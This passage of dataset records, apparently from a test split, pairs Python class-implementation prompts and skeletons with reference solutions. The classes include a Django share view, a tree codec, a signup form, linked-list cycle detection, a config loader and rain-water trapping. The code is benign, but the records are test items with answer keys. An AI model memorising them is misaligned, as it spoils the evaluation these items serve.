form_kwargs = super().get_form_kwargs()\n form_kwargs['workflow'] = self.workflow\n form_kwargs['user'] = self.request.user\n return form_kwargs\n\n def form_valid(self, form) -> http.JsonResponse:\n \"\"\"Store the new shared user\"\"\"\n self.workflow.shared.add(form.user_obj)\n self.workflow.save()\n self.workflow.log(self.request.user, models.Log.WORKFLOW_SHARE_ADD, share_email=form.user_obj.email)\n return http.JsonResponse({'html_redirect': ''})\n", "source": "the_stack_v2_python_sparse", "source_path": "ontask/workflow/views/share.py", "source_repo": "abelardopardo/ontask_b", "split": "test", "star_events_count": 43} {"blob_id": "5884eb3002f49bc3129b14e6eba27b0794c924ae", "bodies": ["ans = ''\nstack = [root]\nwhile stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\nreturn ans", "def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\nreturn parse(0)[0]"], "bodies_text": "<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return 
parse(0)[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000394", "length_bytes": 1395, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n<|end_body_1|>\n", "revision_id": "43a5e436b6ec8950c6952554329ae0314430afea", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n ans = ''\n stack = [root]\n while stack:\n node = stack.pop()\n if not node:\n ans += '^$'\n else:\n ans += '^{}('.format(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ans\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n def parse(i):\n assert data[i] == '^'\n i += 1\n if data[i] == '$':\n return (None, i + 1)\n j = i\n while data[i] != '(':\n i += 1\n val = int(data[j:i])\n i += 1\n left, i = parse(i)\n right, i = parse(i)\n root = TreeNode(val)\n root.left = left\n root.right = right\n return (root, i)\n return parse(0)[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "problems/serialize_and_deserialize_binary_tree/solution.py", "source_repo": "dengl11/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "fc32afcc9b211ae3281ea224e46296a23c77590b", "bodies": ["logger.debug('Args: %s; kwargs: %s', args, kwargs)\nself.helper = FormHelper()\nself.helper.form_id = 'signup_form'\nself.helper.form_class = 'signup'\nself.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n
You must select at least one tag. These tags\n control which job postings will be shown to you and which\n will not. Only those jobs that match these tags will be\n visible to you. This can be changed later.
\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\nsuper(CustomSignupForm, self).__init__(*args, **kwargs)", "tags = self.cleaned_data['tags']\nlogger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\nuser.profile.tags.add(*self.cleaned_data['tags'])\nuser.profile.save()\ncreate_userjobs_for(user)"], "bodies_text": "<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n
You must select at least one tag. These tags\n control which job postings will be shown to you and which\n will not. Only those jobs that match these tags will be\n visible to you. This can be changed later.
\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "class_docstring": "Customize django-allauth SignupForm to include tags.", "class_name": "CustomSignupForm", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n
You must select at least one tag. These tags\n control which job postings will be shown to you and which\n will not. Only those jobs that match these tags will be\n visible to you. This can be changed later.
\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000395", "length_bytes": 2749, "license_type": "permissive", "methods": [{"docstring": "Create a pretty crispy form.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Provide custom signup step (saving tags).", "name": "signup", "signature": "def signup(self, request, user)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004128", "prompt": "Implement the Python class `CustomSignupForm` described below.\n\nClass description:\nCustomize django-allauth SignupForm to include tags.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Create a pretty crispy form.\n- def signup(self, request, user): Provide custom signup step (saving tags).", "prompted_full_text": "Implement the Python class `CustomSignupForm` described below.\n\nClass description:\nCustomize django-allauth SignupForm to include tags.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Create a pretty crispy form.\n- def signup(self, request, user): Provide custom signup step (saving tags).\n\n<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n
You must select at least one tag. These tags\n control which job postings will be shown to you and which\n will not. Only those jobs that match these tags will be\n visible to you. This can be changed later.
\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n<|end_body_1|>\n", "revision_id": "7882aa8ed42afe689e594a3e10c9fc6369f70bf5", "skeleton": "<|skeleton|>\nclass CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n <|body_0|>\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomSignupForm:\n \"\"\"Customize django-allauth SignupForm to include tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a pretty crispy form.\"\"\"\n logger.debug('Args: %s; kwargs: %s', args, kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'signup_form'\n self.helper.form_class = 'signup'\n self.helper.layout = Layout(Fieldset('Account Details', 'username', 'email', 'password1', 'password2'), Fieldset('My Profile', HTML('\\n
You must select at least one tag. These tags\n control which job postings will be shown to you and which\n will not. Only those jobs that match these tags will be\n visible to you. This can be changed later.
\\n '), 'tags'), ButtonHolder(Submit('submit', 'Sign Up »')))\n super(CustomSignupForm, self).__init__(*args, **kwargs)\n\n def signup(self, request, user):\n \"\"\"Provide custom signup step (saving tags).\"\"\"\n tags = self.cleaned_data['tags']\n logger.info('User Signup: %s; request: %s; tags: %s', user, request, tags)\n user.profile.tags.add(*self.cleaned_data['tags'])\n user.profile.save()\n create_userjobs_for(user)\n", "source": "the_stack_v2_python_sparse", "source_path": "freelancefinder/users/forms.py", "source_repo": "simo97/freelancefinder", "split": "test", "star_events_count": 0} {"blob_id": "f9afb11fbf9d6e40bc440919c405d93abd8ef0fa", "bodies": ["fast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\nreturn False", "if not head:\n return False\nif not head.next:\n return False\nnode_set = set()\ncurrent = head\nwhile current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\nreturn False", "if not (head and head.next):\n return\nnode_set = set()\ncurrent = head\nwhile current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\nreturn", "if not (head and head.next):\n return\nfast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\nif not fast or not fast.next:\n return\nmeet_point = slow\nfast = head\nwhile fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\nreturn meet_point", "if head is None or head.next is None:\n return\nfast = slow = head\nwhile fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\nreturn"], "bodies_text": "<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def 
hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000396", "length_bytes": 2526, "license_type": "no_license", "methods": [{"docstring": ":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针", "name": "hasCycle", "signature": "def hasCycle(self, head)"}, {"docstring": ":type head: ListNode :rtype: bool", "name": "hasCycle1", "signature": "def hasCycle1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle", "signature": "def detectCycle(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle1", "signature": "def detectCycle1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "detectCycle2", "signature": "def detectCycle2(self, head)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004655", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def hasCycle(self, head): :type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\n- def hasCycle1(self, head): :type head: ListNode :rtype: bool\n- def detectCycle(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle1(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle2(self, head): :type head: ListNode :rtype: ListNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def hasCycle(self, head): :type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\n- def hasCycle1(self, head): :type 
head: ListNode :rtype: bool\n- def detectCycle(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle1(self, head): :type head: ListNode :rtype: ListNode\n- def detectCycle2(self, head): :type head: ListNode :rtype: ListNode\n\n<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n<|end_body_3|>\n\n<|body_start_4|>\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n<|end_body_4|>\n", "revision_id": "11ad9d3841de09c0b4dc3a667e7e63c3558656a5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n <|body_0|>\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n <|body_1|>\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_2|>\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_3|>\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def hasCycle(self, head):\n \"\"\":type head: ListNode :rtype: bool https://leetcode.com/problems/linked-list-cycle/solution/ 提供了两种解决方法,hash 和两个快慢指针\"\"\"\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n return False\n\n def hasCycle1(self, head):\n \"\"\":type head: ListNode :rtype: bool\"\"\"\n if not head:\n return False\n if not head.next:\n return False\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n 
node_set.add(current)\n current = current.next\n else:\n return True\n return False\n\n def detectCycle(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not (head and head.next):\n return\n node_set = set()\n current = head\n while current:\n if current not in node_set:\n node_set.add(current)\n current = current.next\n else:\n return current\n return\n\n def detectCycle1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not (head and head.next):\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n if not fast or not fast.next:\n return\n meet_point = slow\n fast = head\n while fast != meet_point:\n fast = fast.next\n meet_point = meet_point.next\n return meet_point\n\n def detectCycle2(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if head is None or head.next is None:\n return\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n fast = head\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return slow\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "link_list_cycle.py", "source_repo": "ganlanshu/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "7afb26e3e36c78a81fa66fe49253244b4f0bac3b", "bodies": ["config = ConfigParser.ConfigParser()\nconfig.read(cfg)\nfor section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)", "try:\n return getattr(self, section)\nexcept AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))"], "bodies_text": "<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Config", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. 
@return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000397", "length_bytes": 1928, "license_type": "permissive", "methods": [{"docstring": "@param file_name: file name without extension. @param cfg: configuration file path.", "name": "__init__", "signature": "def __init__(self, cfg='config.conf')"}, {"docstring": "Get option. @param section: section to fetch. @return: option value.", "name": "get", "signature": "def get(self, section)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006333", "prompt": "Implement the Python class `Config` described below.\n\nClass description:\nImplement the Config class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg='config.conf'): @param file_name: file name without extension. @param cfg: configuration file path.\n- def get(self, section): Get option. @param section: section to fetch. @return: option value.", "prompted_full_text": "Implement the Python class `Config` described below.\n\nClass description:\nImplement the Config class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg='config.conf'): @param file_name: file name without extension. @param cfg: configuration file path.\n- def get(self, section): Get option. @param section: section to fetch. @return: option value.\n\n<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n<|end_body_1|>\n", "revision_id": "cec3f47692bc77fbdcb397ad7ec21c994328fc00", "skeleton": "<|skeleton|>\nclass Config:\n\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n <|body_0|>\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. 
@return: option value.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Config:\n def __init__(self, cfg='config.conf'):\n \"\"\"@param file_name: file name without extension. @param cfg: configuration file path.\"\"\"\n config = ConfigParser.ConfigParser()\n config.read(cfg)\n for section in config.sections():\n setattr(self, section, Dictionary())\n for name, raw_value in config.items(section):\n try:\n if config.get(section, name) in ['0', '1']:\n raise ValueError\n value = config.getboolean(section, name)\n except ValueError:\n try:\n value = config.getint(section, name)\n except ValueError:\n value = config.get(section, name)\n setattr(getattr(self, section), name, value)\n\n def get(self, section):\n \"\"\"Get option. @param section: section to fetch. @return: option value.\"\"\"\n try:\n return getattr(self, section)\n except AttributeError as e:\n raise OperationalError('Option %s is not found in configuration, error: %s' % (section, e))\n", "source": "the_stack_v2_python_sparse", "source_path": "deeploader/dataset/config.py", "source_repo": "cnzeki/DeepLoader", "split": "test", "star_events_count": 1} {"blob_id": "841410261ea7c210a8f8ff63fa62aafa172f3b8d", "bodies": ["if not height:\n return 0\nmax_right = [height[-1]]\nrheight = reversed(height)\nnext(rheight)\nfor i, h in enumerate(rheight):\n max_right.append(max(max_right[i], h))\nmax_right.reverse()\nmax_left = [height[0]]\nfor i, h in enumerate(height[1:]):\n max_left.append(max(max_left[i], h))\ns = 0\nfor h, l, r in zip(height, max_left, max_right):\n s += min(l, r) - h\nreturn s", "height = [0] + height + [0]\nn = len(height)\nleft_highest = [0]\nfor i in range(1, len(height)):\n left_highest.append(max(left_highest[i - 1], height[i - 1]))\nright_highest = [0]\nfor i in range(1, len(height)):\n right_highest.append(max(right_highest[i - 1], height[len(height) - 1 - i]))\nright_highest.reverse()\nret = 0\nfor h, lh, rh in zip(height, left_highest, right_highest):\n ret += max(0, min(lh, rh) - h)\nreturn ret", "if not height:\n return 0\nret = 0\nhighest_idx = 0\nhighest = height[highest_idx]\nwater = 0\nfor i in range(1, len(height)):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\nhighest_idx_from_left = highest_idx\nhighest_idx = len(height) - 1\nhighest = height[highest_idx]\nwater = 0\nfor i in range(len(height) - 2, highest_idx_from_left - 1, -1):\n h = height[i]\n if h < highest:\n water += highest - h\n else:\n highest = h\n highest_idx = i\n ret += water\n water = 0\nreturn ret", "max_from_left = [0]\nmax_from_right = 